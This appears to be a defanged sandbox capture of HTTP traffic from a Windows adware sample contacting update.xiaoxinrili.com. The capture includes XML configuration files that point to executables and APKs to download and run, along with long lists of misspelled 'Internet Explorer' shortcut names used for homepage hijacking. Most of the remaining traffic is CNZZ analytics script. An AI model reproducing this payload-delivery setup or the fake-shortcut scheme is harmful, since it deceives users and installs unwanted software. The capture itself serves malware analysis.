2758..(function(){function k(){this.c="4881483";this.R="z";this.N="";this.K="";this.M="";this.r="1421236290";this.P="hzs19.cnzz.com";this.L="";this.u="CNZZDATA" this.c;this.t="_CNZZDbridge_" this.c;this.F="_cnzz_CV" this.c;this.G="CZ_UUID" this.c;this.v="0";this.A={};this.a={};this.la()}function g(a,b){try{var c=.[];c.push("siteid=4881483");c.push("name=" f(a.name));c.push("msg=" f(a.message));c.push("r=" f(h.referrer));c.push("page=" f(e.location.href));c.push("agent=" f(e.navigator.userAgent));c.push("ex=" f(b));c.push("rnd=" Math.floor(2147483648*Math.random()));(new Image).src="hXXp://jserr.cnzz.com/log.php?" c.join("&")}catch(d){}}var h=document,e=window,f=encodeURIComponent,l=decodeURIComponent,n=unescape,p=escape;k.prototype={la:function(){try{this.U(),this.J(),this.ia(),this.H(),this.o(),.this.ga(),this.fa(),this.ja(),this.j(),this.ea(),this.ha(),this.ka(),this.ca(),this.aa(),this.da(),this.qa(),e[this.t]=e[this.t]||{},this.ba("_cnzz_CV")}catch(a){g(a,"i failed")}},oa:function(){try{var a=this;e._czc={push:function(){return a.B.apply(a,arguments)}}}catch(b){g(b,"oP failed")}},aa:function(){try{var a=e._czc;if("[object Array]"==={}.toString.call(a))for(var b=0;b<a.length;b ){var c=a[b];switch(c[0]){case "_setAccount":e._cz_account="[object String]"==={}.toString.call(c[1])?c[1]:String(c[1]);.break;case "_setAutoPageview":"boolean"===typeof c[1]&&(e._cz_autoPageview=c[1])}}}catch(d){g(d,"cS failed")}},qa:function(){try{if("undefined"===typeof e._cz_account||e._cz_account===this.c){e._cz_account=this.c

<<< skipped >>>

GET /stat.php?id=4878044&web_id=4878044 HTTP/1.1

Accept: */*

Referer: hXXp://update.xiaoxinrili.com/tj.html?%original file name%.exe

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: s19.cnzz.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: Tengine

Content-Type: application/javascript

Content-Length: 10072

Connection: keep-alive

Date: Wed, 14 Jan 2015 11:01:38 GMT

Last-Modified: Wed, 14 Jan 2015 11:01:38 GMT

Cache-Control: max-age=5400,s-maxage=5400

Age: 2993

X-Cache: HIT TCP_MEM_HIT dirn:7:784156534

X-Swift-SaveTime: Wed, 14 Jan 2015 11:01:38 GMT

X-Swift-CacheTime: 5400

Via: cache1.de1[0,200-0,H], cache5.de1[1,0]

(function(){function k(){this.c="4878044";this.R="z";this.N="";this.K="";this.M="";this.r="1421233298";this.P="hzs19.cnzz.com";this.L="";this.u="CNZZDATA" this.c;this.t="_CNZZDbridge_" this.c;this.F="_cnzz_CV" this.c;this.G="CZ_UUID" this.c;this.v="0";this.A={};this.a={};this.la()}function g(a,b){try{var c=.[];c.push("siteid=4878044");c.push("name=" f(a.name));c.push("msg=" f(a.message));c.push("r=" f(h.referrer));c.push("page=" f(e.location.href));c.push("agent=" f(e.navigator.userAgent));c.push("ex=" f(b));c.push("rnd=" Math.floor(2147483648*Math.random()));(new Image).src="hXXp://jserr.cnzz.com/log.php?" c.join("&")}catch(d){}}var h=document,e=window,f=encodeURIComponent,l=decodeURIComponent,n=unescape,p=escape;k.prototype={la:function(){try{this.U(),this.J(),this.ia(),this.H(),this.o(),.this.ga(),this.fa(),this.ja(),this.j(),this.ea(),this.ha(),this.ka(),this.ca(),this.aa(),this.da(),this.qa(),e[this.t]=e[this.t]||{},this.ba("_cnzz_CV")}catch(a){g(a,"i failed")}},oa:function(){try{var a=this;e._czc={push:function(){return a.B.apply(a,arguments)}}}catch(b){g(b,"oP failed")}},aa:function(){try{var a=e._czc;if("[object Array]"==={}.toString.call(a))for(var b=0;b<a.length;b ){var c=a[b];switch(c[0]){case "_setAccount":e._cz_account="[object String]"==={}.toString.call(c[1])?c[1]:String(c[1]);.break;case "_setAutoPageview":"boolean"===typeof c[1]&&(e._cz_autoPageview=c[1])}}}catch(d){g(d,"cS failed")}},qa:function(){try{if("undefined"===typeof e._cz_account||e._cz_account===this.c){e._cz_account=this.c;if("[

<<< skipped >>>

GET /InstProtect.txt HTTP/1.1

User-Agent: MERONG(0.9/;p)

Accept: */*

Host: update.xiaoxinrili.com

Connection: Keep-Alive

Cookie: CNZZDATA5467330=cnzz_eid=1312808906-1421232890-&ntime=1421232890; CNZZDATA30085361=cnzz_eid=162298059-1421232891-&ntime=1421232891; AJSTAT_ok_pages=1; AJSTAT_ok_times=1; CNZZDATA5554906=cnzz_eid=53975052-1421233896-&ntime=1421233896

HTTP/1.1 200 OK

Content-Type: text/plain

Last-Modified: Wed, 19 Nov 2014 07:54:35 GMT

Accept-Ranges: bytes

ETag: "cbc3f6fce3d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Wed, 14 Jan 2015 11:53:37 GMT

Content-Length: 1

0HTTP/1.1 200 OK..Content-Type: text/plain..Last-Modified: Wed, 19 Nov 2014 07:54:35 GMT..Accept-Ranges: bytes..ETag: "cbc3f6fce3d01:0"..Server: Microsoft-IIS/7.5..X-Powered-By: ASP.NET..Date: Wed, 14 Jan 2015 11:53:37 GMT..Content-Length: 1..0..

GET /core.php?web_id=4878044&t=z HTTP/1.1

Accept: */*

Referer: hXXp://update.xiaoxinrili.com/tj.html?%original file name%.exe

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: c.cnzz.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: Tengine

Content-Type: application/javascript

Content-Length: 751

Connection: keep-alive

Date: Wed, 14 Jan 2015 11:51:33 GMT

Last-Modified: Wed, 14 Jan 2015 11:51:33 GMT

Expires: Wed, 14 Jan 2015 12:06:33 GMT

X-Cache: MISS TCP_REFRESH_MISS dirn:-2:-2

X-Swift-SaveTime: Wed, 14 Jan 2015 11:51:33 GMT

X-Swift-CacheTime: 900

Via: cache10.de1[1721,200-0,M], cache3.de1[1722,0]

!function(){var p,q,r,a=encodeURIComponent,b="4878044",c="",d="",e="online_v3.php",f="hzs19.cnzz.com",g="1",h="text",i="z",j="站长统计",k=window["_CNZZDbridge_" b].bobject,l="http:",m="0",n=l "//online.cnzz.com/online/" e,o=[];o.push("id=" b),o.push("h=" f),o.push("on=" a(d)),o.push("s=" a(c)),n ="?" o.join("&"),"0"===m&&k.callRequest([l "//cnzz.mmstat.com/9.gif?abc=1"]),g&&(""!==d?k.createScriptIcon(n,"utf-8"):(q="z"==i?"hXXp://VVV.cnzz.com/stat/website.php?web_id=" b:"hXXp://quanjing.cnzz.com","pic"===h?(r=l "//icon.cnzz.com/img/" c ".gif",p="<a href='" q "' target=_blank title='" j "'><img border=0 hspace=0 vspace=0 src='" r "'></a>"):p="<a href='" q "' target=_blank title='" j "'>" j "</a>",k.createIcon([p])))}();HTTP/1.1 200 OK..Server: Tengine..Content-Type: application/javascript..Content-Length: 751..Connection: keep-alive..Date: Wed, 14 Jan 2015 11:51:33 GMT..Last-Modified: Wed, 14 Jan 2015 11:51:33 GMT..Expires: Wed, 14 Jan 2015 12:06:33 GMT..X-Cache: MISS TCP_REFRESH_MISS dirn:-2:-2..X-Swift-SaveTime: Wed, 14 Jan 2015 11:51:33 GMT..X-Swift-CacheTime: 900..Via: cache10.de1[1721,200-0,M], cache3.de1[1722,0]..!function(){var p,q,r,a=encodeURIComponent,b="4878044",c="",d="",e="online_v3.php",f="hzs19.cnzz.com",g="1",h="text",i="z",j="站长统计",k=window["_CNZZDbridge_" b].bobject,l="http:",m="0",n=l "//online.cnzz.com/online/" e,o=[];o.push("id=" b),o.push("h=" f),o.push("on=" a(d)),o.push("s=" a(c)),n ="?" o.join("&"),"0"===m&&

<<< skipped >>>

GET /core.php?web_id=1253322244&t=z HTTP/1.1

Accept: */*

Referer: hXXp://down.xiaoxinrili.com/hezi/xxurl.html?iexplore.exe

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: c.cnzz.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: Tengine

Content-Type: application/javascript

Content-Length: 751

Connection: keep-alive

Date: Wed, 14 Jan 2015 11:51:39 GMT

Last-Modified: Wed, 14 Jan 2015 11:51:39 GMT

Expires: Wed, 14 Jan 2015 12:06:39 GMT

X-Cache: MISS TCP_REFRESH_MISS dirn:-2:-2

X-Swift-SaveTime: Wed, 14 Jan 2015 11:51:39 GMT

X-Swift-CacheTime: 900

Via: cache9.de1[1208,200-0,M], cache3.de1[1209,0]

!function(){var p,q,r,a=encodeURIComponent,b="1253322244",c="",d="",e="online_v3.php",f="z9.cnzz.com",g="1",h="text",i="z",j="站长统计",k=window["_CNZZDbridge_" b].bobject,l="http:",m="0",n=l "//online.cnzz.com/online/" e,o=[];o.push("id=" b),o.push("h=" f),o.push("on=" a(d)),o.push("s=" a(c)),n ="?" o.join("&"),"0"===m&&k.callRequest([l "//cnzz.mmstat.com/9.gif?abc=1"]),g&&(""!==d?k.createScriptIcon(n,"utf-8"):(q="z"==i?"hXXp://VVV.cnzz.com/stat/website.php?web_id=" b:"hXXp://quanjing.cnzz.com","pic"===h?(r=l "//icon.cnzz.com/img/" c ".gif",p="<a href='" q "' target=_blank title='" j "'><img border=0 hspace=0 vspace=0 src='" r "'></a>"):p="<a href='" q "' target=_blank title='" j "'>" j "</a>",k.createIcon([p])))}();HTTP/1.1 200 OK..Server: Tengine..Content-Type: application/javascript..Content-Length: 751..Connection: keep-alive..Date: Wed, 14 Jan 2015 11:51:39 GMT..Last-Modified: Wed, 14 Jan 2015 11:51:39 GMT..Expires: Wed, 14 Jan 2015 12:06:39 GMT..X-Cache: MISS TCP_REFRESH_MISS dirn:-2:-2..X-Swift-SaveTime: Wed, 14 Jan 2015 11:51:39 GMT..X-Swift-CacheTime: 900..Via: cache9.de1[1208,200-0,M], cache3.de1[1209,0]..!function(){var p,q,r,a=encodeURIComponent,b="1253322244",c="",d="",e="online_v3.php",f="z9.cnzz.com",g="1",h="text",i="z",j="站长统计",k=window["_CNZZDbridge_" b].bobject,l="http:",m="0",n=l "//online.cnzz.com/online/" e,o=[];o.push("id=" b),o.push("h=" f),o.push("on=" a(d)),o.push("s=" a(c)),n ="?" o.join("&"),"0"===m&&k

<<< skipped >>>

GET /core.php?web_id=5614889&t=z HTTP/1.1

Accept: */*

Referer: hXXp://update.xiaoxinrili.com/daohang/jsq/tj.html?%original file name%.exe

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: c.cnzz.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: Tengine

Content-Type: application/javascript

Content-Length: 749

Connection: keep-alive

Date: Wed, 14 Jan 2015 11:49:49 GMT

Last-Modified: Wed, 14 Jan 2015 11:49:49 GMT

Expires: Wed, 14 Jan 2015 12:04:49 GMT

Age: 126

X-Cache: HIT TCP_MEM_HIT dirn:-2:-2

X-Swift-SaveTime: Wed, 14 Jan 2015 11:49:49 GMT

X-Swift-CacheTime: 900

Via: cache5.de1[0,200-0,H], cache3.de1[0,0]

!function(){var p,q,r,a=encodeURIComponent,b="5614889",c="",d="",e="online_v3.php",f="z12.cnzz.com",g="1",h="text",i="z",j="站长统计",k=window["_CNZZDbridge_" b].bobject,l="http:",m="0",n=l "//online.cnzz.com/online/" e,o=[];o.push("id=" b),o.push("h=" f),o.push("on=" a(d)),o.push("s=" a(c)),n ="?" o.join("&"),"0"===m&&k.callRequest([l "//cnzz.mmstat.com/9.gif?abc=1"]),g&&(""!==d?k.createScriptIcon(n,"utf-8"):(q="z"==i?"hXXp://VVV.cnzz.com/stat/website.php?web_id=" b:"hXXp://quanjing.cnzz.com","pic"===h?(r=l "//icon.cnzz.com/img/" c ".gif",p="<a href='" q "' target=_blank title='" j "'><img border=0 hspace=0 vspace=0 src='" r "'></a>"):p="<a href='" q "' target=_blank title='" j "'>" j "</a>",k.createIcon([p])))}();HTTP/1.1 200 OK..Server: Tengine..Content-Type: application/javascript..Content-Length: 749..Connection: keep-alive..Date: Wed, 14 Jan 2015 11:49:49 GMT..Last-Modified: Wed, 14 Jan 2015 11:49:49 GMT..Expires: Wed, 14 Jan 2015 12:04:49 GMT..Age: 126..X-Cache: HIT TCP_MEM_HIT dirn:-2:-2..X-Swift-SaveTime: Wed, 14 Jan 2015 11:49:49 GMT..X-Swift-CacheTime: 900..Via: cache5.de1[0,200-0,H], cache3.de1[0,0]..!function(){var p,q,r,a=encodeURIComponent,b="5614889",c="",d="",e="online_v3.php",f="z12.cnzz.com",g="1",h="text",i="z",j="站长统计",k=window["_CNZZDbridge_" b].bobject,l="http:",m="0",n=l "//online.cnzz.com/online/" e,o=[];o.push("id=" b),o.push("h=" f),o.push("on=" a(d)),o.push("s=" a(c)),n ="?" o.join("&"),"0"===m&&k.callR

<<< skipped >>>

GET /stat.php?id=1253322244 HTTP/1.1

Accept: */*

Referer: hXXp://down.xiaoxinrili.com/hezi/xxurl.html?iexplore.exe

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: s5.cnzz.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: Tengine

Content-Type: application/javascript

Transfer-Encoding: chunked

Connection: keep-alive

Date: Wed, 14 Jan 2015 11:51:37 GMT

Last-Modified: Wed, 14 Jan 2015 11:51:37 GMT

Cache-Control: max-age=5400,s-maxage=5400

Cache-Control: max-age=5400,s-maxage=5400

X-Cache: MISS TCP_REFRESH_MISS dirn:-2:-2

X-Swift-SaveTime: Wed, 14 Jan 2015 11:51:38 GMT

X-Swift-CacheTime: 5399

Via: cache10.de1[1016,200-0,M], cache6.de1[1017,0]

2d3..(function(){function k(){this.c="1253322244";this.R="z";this.N="";this.K="";this.M="";this.r="1421236297";this.P="z9.cnzz.com";this.L="";this.u="CNZZDATA" this.c;this.t="_CNZZDbridge_" this.c;this.F="_cnzz_CV" this.c;this.G="CZ_UUID" this.c;this.v="0";this.A={};this.a={};this.la()}function g(a,b){try{var c=.[];c.push("siteid=1253322244");c.push("name=" f(a.name));c.push("msg=" f(a.message));c.push("r=" f(h.referrer));c.push("page=" f(e.location.href));c.push("agent=" f(e.navigator.userAgent));c.push("ex=" f(b));c.push("rnd=" Math.floor(2147483648*Math.random()));(new Image).src="hXXp://jserr.cnzz.com/log.php?" c.join("&")}catch(d){}}var h=document,e=window,f=encodeURIComponent,l=decodeURIComponent,n=unescape,p=esc..2488..ape;k.prototype={la:function(){try{this.U(),this.J(),this.ia(),this.H(),this.o(),.this.ga(),this.fa(),this.ja(),this.j(),this.ea(),this.ha(),this.ka(),this.ca(),this.aa(),this.da(),this.qa(),e[this.t]=e[this.t]||{},this.ba("_cnzz_CV")}catch(a){g(a,"i failed")}},oa:function(){try{var a=this;e._czc={push:function(){return a.B.apply(a,arguments)}}}catch(b){g(b,"oP failed")}},aa:function(){try{var a=e._czc;if("[object Array]"==={}.toString.call(a))for(var b=0;b<a.length;b ){var c=a[b];switch(c[0]){case "_setAccount":e._cz_account="[object String]"==={}.toString.call(c[1])?c[1]:String(c[1]);.break;case "_setAutoPageview":"boolean"===typeof c[1]&&(e._cz_autoPageview=c[1])}}}catch(d){g(d,"cS failed")}},qa:function(){try{if("undefined"===typeof e._cz_account||e._cz_account===this.c){e._cz_acco

<<< skipped >>>

GET /files/conn_engine/2.69.0.5490.zip HTTP/1.1

Range: bytes=0-

User-Agent: WDJConnEngine

Host: dl.cdn.wandoujia.com

Cache-Control: no-cache

Connection: Keep-Alive

HTTP/1.1 302 Found

Server: Tengine/1.4.6

Date: Wed, 14 Jan 2015 11:51:35 GMT

Content-Type: text/html

Content-Length: 266

Connection: keep-alive

Location: hXXp://fw1.dl.wdjcdn.com/files/conn_engine/2.69.0.5490.zip

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<h1>302 Found</h1>..<p>The requested resource resides temporarily under a different URI.</p>..<hr/>Powered by Tengine/1.4.6..</body>..</html>..HTTP/1.1 302 Found..Server: Tengine/1.4.6..Date: Wed, 14 Jan 2015 11:51:35 GMT..Content-Type: text/html..Content-Length: 266..Connection: keep-alive..Location: hXXp://fw1.dl.wdjcdn.com/files/conn_engine/2.69.0.5490.zip..<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<h1>302 Found</h1>..<p>The requested resource resides temporarily under a different URI.</p>..<hr/>Powered by Tengine/1.4.6..</body>..</html>....

GET /c.php?id=30085361&l=3 HTTP/1.1

Accept: */*

Referer: hXXp://update.xiaoxinrili.com/daohang/xttj.html?%original file name%.exe

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: w.cnzz.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: Tengine

Content-Type: application/javascript

Content-Length: 10074

Connection: keep-alive

Date: Wed, 14 Jan 2015 10:54:51 GMT

Last-Modified: Wed, 14 Jan 2015 10:54:51 GMT

Cache-Control: max-age=5400,s-maxage=5400

Age: 3385

X-Cache: HIT TCP_MEM_HIT dirn:6:242871715

X-Swift-SaveTime: Wed, 14 Jan 2015 10:54:52 GMT

X-Swift-CacheTime: 5399

Via: cache5.de1[0,200-0,H], cache2.de1[0,0]

(function(){function k(){this.c="30085361";this.R="q";this.N="";this.K="3";this.M="";this.r="1421232891";this.P="hqs5.cnzz.com";this.L="";this.u="CNZZDATA" this.c;this.t="_CNZZDbridge_" this.c;this.F="_cnzz_CV" this.c;this.G="CZ_UUID" this.c;this.v="0";this.A={};this.a={};this.la()}function g(a,b){try{var c=.[];c.push("siteid=30085361");c.push("name=" f(a.name));c.push("msg=" f(a.message));c.push("r=" f(h.referrer));c.push("page=" f(e.location.href));c.push("agent=" f(e.navigator.userAgent));c.push("ex=" f(b));c.push("rnd=" Math.floor(2147483648*Math.random()));(new Image).src="hXXp://jserr.cnzz.com/log.php?" c.join("&")}catch(d){}}var h=document,e=window,f=encodeURIComponent,l=decodeURIComponent,n=unescape,p=escape;k.prototype={la:function(){try{this.U(),this.J(),this.ia(),this.H(),this.o(),.this.ga(),this.fa(),this.ja(),this.j(),this.ea(),this.ha(),this.ka(),this.ca(),this.aa(),this.da(),this.qa(),e[this.t]=e[this.t]||{},this.ba("_cnzz_CV")}catch(a){g(a,"i failed")}},oa:function(){try{var a=this;e._czc={push:function(){return a.B.apply(a,arguments)}}}catch(b){g(b,"oP failed")}},aa:function(){try{var a=e._czc;if("[object Array]"==={}.toString.call(a))for(var b=0;b<a.length;b ){var c=a[b];switch(c[0]){case "_setAccount":e._cz_account="[object String]"==={}.toString.call(c[1])?c[1]:String(c[1]);.break;case "_setAutoPageview":"boolean"===typeof c[1]&&(e._cz_autoPageview=c[1])}}}catch(d){g(d,"cS failed")}},qa:function(){try{if("undefined"===typeof e._cz_account||e._cz_account===this.c){e._cz_account=this.c;if(

<<< skipped >>>

GET /ico/Icon_1.ico HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: down.xiaoxinrili.com

Connection: Keep-Alive

Cookie: CNZZDATA1253322244=307117902-1421236297-|1421236297

HTTP/1.1 200 OK

Server: nginx/1.4.1

Date: Wed, 14 Jan 2015 11:51:42 GMT

Content-Type: image/x-icon

Content-Length: 97527

Cache-Control: max-age=1200

Last-Modified: Sat, 31 Aug 2013 07:53:06 GMT

Cache-by-CoreNode: HIT From cha-ld-mgslb-sdwf-core1-mnd1

Cache-by-Node: HIT From cha-ld-lnmas-cs1-nd4

Accept-Ranges: bytes

......00......h....... ..........>...............&...........(.......00..........6... ...........................$..........h...N ........ ......0..00.... ..%...8.. .... ....._^........ ......o........ .h....x..(...0...`............................................................................................................................;8.......................{.p........................p.................;p.....................................................|f...lh................F....nn.F.........;....F.n......lg............Fl..........@.......;..t..n~x......fDp......y..Fl........~.lf..........df.n~~.....g..D.........f.l....fn.~.l.d..........l....W.un.............vlf...@.....~Nld`......;.ldl.......n...f@p.......f.n.W.....V..ld@.......;VdFl`......wwwwwp.......<fl.p.....................F.@.................8..f.fgggggggfvfVF......{..vFF........lfF@B.....w.8.ddn......nf.dd......{x..FFFn.......f.d......s...6FF.nlv.~nf.fF.......7...d.gGvvvllvf.BG..........Vp........ffd.......kx..v......v.f.vD.......G;...@.....nn.ffd0.....@dw..{7.....lv..l`.......$g8...p....nl~fvd........fs...4p..g....l.........dg{.{.fFGnv..vv@.......pwfwx..wwvw.~w............wg........w.vG..........w.w.......xx.p..........F...........G...........pH....{x...D.............pH.......D...............pw.....e..................vwwx.p................................................{.....p............................................{;p..........................................................................?..........................?.......

<<< skipped >>>

GET /stat.htm?id=5467330&r=&lg=en-us&ntime=none&cnzz_eid=1312808906-1421232890-&showp=1276x846&t=&h=1&rnd=2027361058 HTTP/1.1

Accept: */*

Referer: hXXp://update.xiaoxinrili.com/daohang/xttj.html?%original file name%.exe

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: hzs23.cnzz.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: Tengine/1.4.1

Date: Wed, 14 Jan 2015 11:51:22 GMT

Content-Type: image/gif

Content-Length: 43

Last-Modified: Tue, 28 May 2013 02:57:17 GMT

Connection: close

Accept-Ranges: bytes

GIF89a.............!.......,...........D..;..

GET /daohang/sj.xml HTTP/1.1

User-Agent: MERONG(0.9/;p)

Accept: */*

Host: update.xiaoxinrili.com

Connection: Keep-Alive

Cookie: CNZZDATA5467330=cnzz_eid=1312808906-1421232890-&ntime=1421232890; CNZZDATA30085361=cnzz_eid=162298059-1421232891-&ntime=1421232891; AJSTAT_ok_pages=1; AJSTAT_ok_times=1; CNZZDATA5554906=cnzz_eid=53975052-1421233896-&ntime=1421233896

HTTP/1.1 200 OK

Content-Type: text/xml

Last-Modified: Thu, 30 Oct 2014 05:23:23 GMT

Accept-Ranges: bytes

ETag: "d443d39f1f4cf1:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Wed, 14 Jan 2015 11:53:34 GMT

Content-Length: 637

<?xml version="1.0" encoding="gb2312"?>..<root>.. <item id="0" off="1" opentime="60" gettime="1440" jiange="3600" shu="3"></item>.. <item id="1" name="hao123" Ads_Url="hXXp://down.xiaoxinrili.com/bao/appHao123_AndroidPhone_v4.7.2.0(4.7.2.0)_1002041t.apk" Ads_Exe="appHao123_AndroidPhone_v4.7.2.0(4.7.2.0)_1002041t.apk" Ads_Param="" ads_img=""></item>..<item id="2" name="........" Ads_Url="hXXp://down.xiaoxinrili.com/bao/9YaoForAndroid.apk" Ads_Exe="9YaoForAndroid.apk" Ads_Param="" ads_img=""></item>..<item id="3" name="360......" Ads_Url="hXXp://cnrdn.com/cnBF" Ads_Exe="360mse_H081067.apk" Ads_Param="" ads_img=""></item>..</root>....

GET /daohang/yx.xml HTTP/1.1

User-Agent: MERONG(0.9/;p)

Accept: */*

Host: update.xiaoxinrili.com

Connection: Keep-Alive

Cookie: CNZZDATA5467330=cnzz_eid=1312808906-1421232890-&ntime=1421232890; CNZZDATA30085361=cnzz_eid=162298059-1421232891-&ntime=1421232891; AJSTAT_ok_pages=1; AJSTAT_ok_times=1; CNZZDATA5554906=cnzz_eid=53975052-1421233896-&ntime=1421233896

HTTP/1.1 200 OK

Content-Type: text/xml

Last-Modified: Sun, 07 Sep 2014 09:12:59 GMT

Accept-Ranges: bytes

ETag: "20fdeeb7bcacf1:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Wed, 14 Jan 2015 11:53:34 GMT

Content-Length: 305

<?xml version="1.0" encoding="gb2312"?>..<root>.. <item id="0" off="0" opentime="1800" gettime="1440" jiange="3600" shu="1" qudaono="" is_quit="0"></item>.. <item id="1" name="........" Ads_Url="hXXp://down.xiaoxinrili.com/bizhi/01/tt0905.exe" Ads_Exe="tt0905.exe" Ads_Param="" ads_img=""></item>..</root>....

GET /daohang/tubiao.xml HTTP/1.1

User-Agent: MERONG(0.9/;p)

Accept: */*

Host: update.xiaoxinrili.com

Connection: Keep-Alive

Cookie: CNZZDATA5467330=cnzz_eid=1312808906-1421232890-&ntime=1421232890; CNZZDATA30085361=cnzz_eid=162298059-1421232891-&ntime=1421232891; AJSTAT_ok_pages=1; AJSTAT_ok_times=1; CNZZDATA5554906=cnzz_eid=53975052-1421233896-&ntime=1421233896

HTTP/1.1 200 OK

Content-Type: text/xml

Last-Modified: Wed, 14 Jan 2015 08:26:54 GMT

Accept-Ranges: bytes

ETag: "2ae5d5dad32fd01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Wed, 14 Jan 2015 11:53:35 GMT

Content-Length: 2263

<?xml version="1.0" encoding="gb2312"?>..<root>..<item tid="0" toff="1" topentime="400" tgettime="1200" tjiange="3600" tshu="3" offone="1" byday="0" IENAV_PElnkisC="0" IENAV_PElnkurl="hXXp://hao.360.cn/?src=lm&ls=n162f37fb94" IENAV_shell_time="10" IENAV_PElnkname="1nternet Exploert.lnk" IENAV_PElnkico="hXXp://down.xiaoxinrili.com/ico/Icon_1.ico" IENAV_shell="1" IENAV_shell_changelist="3600.........lnk,Internet Sulierie.lnk,Internet Explorers.lnk,Internet KuaipIE.lnk,hao123.........lnk,Intarnat Explarer.lnk,Internet Eslangie.lnk,Internet Expubie.lnk,Internet .Hao360..lnk,Internet Eslangie.lnk,Internet Explorers.lnk,Internet KuaipIE.lnk,1ntrenet Hao.123..lnk,Internet Exp1orer.lnk,Internet Hao123 .lnk,Internet Hao360.lnk,Internet Explorer.lnk,3600.........lnk,360.........lnk, 1nternot Hao123s.lnk, Internor Hao123.lnk, 1nternot Hao123.lnk,360..........6.lnk,360.........lnk,1nternet .Hao360..lnk,1nternet Explorer.lnk,Internet Explorer.lnk,Internet Explorer.lnk,Internet Explarcrs,lnk,Internet Exp1orer,lnk,Internet Explorer.lnk,Intermet hao123cs.lnk,1ntermet hao123rl.lnk, Intener Hao123,lnk,360...... 3600.lnk,Intotnot ExpIerer,Intornet HaoI123,1ntornet .HaoI123.,Internet ExpIorer.exe,Intornet HaoI123.lnk,1ntomret _hao.123.lnk,....123.lnk,....123.........lnk,Internet Expiorer.lnk,.................lnk," IENAV_shell_changeurl = "hXXp://hao.360.cn/?src=lm&ls=n162f37fb94" IENAV_shell_dellist = ""..></item>..<item tid="1" name="Internet Exploror" Ads_Url="hXXp://VVV.315619.com/?a01

<<< skipped >>>

GET /9.gif?abc=1&rnd=1658784305 HTTP/1.1

Accept: */*

Referer: hXXp://update.xiaoxinrili.com/tj.html?%original file name%.exe

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: cnzz.mmstat.com

Connection: Keep-Alive

HTTP/1.1 302 Found

Server: Tengine

Date: Wed, 14 Jan 2015 11:51:34 GMT

Content-Type: image/gif

Content-Length: 43

Connection: keep-alive

P3P: CP="NOI DSP COR CURa ADMa DEVa PSAa PSDa OUR IND UNI PUR NAV"

Set-Cookie: cna=RkY9DbJslnYCAcGK9OdJn7XJ; expires=Sat, 11-Jan-25 11:51:34 GMT; path=/; domain=.mmstat.com

Set-Cookie: sca=e1a96173; path=/; domain=.cnzz.mmstat.com

Set-Cookie: atpsida=6b6110718aa3354e88624c9e_1421236294; expires=Sat, 11-Jan-25 11:51:34 GMT; path=/; domain=.cnzz.mmstat.com

Location: hXXp://pcookie.cnzz.com/app.gif?&cna=RkY9DbJslnYCAcGK9OdJn7XJ

Expires: Thu, 01 Jan 1970 00:00:01 GMT

Cache-Control: no-cache

Pragma: no-cache

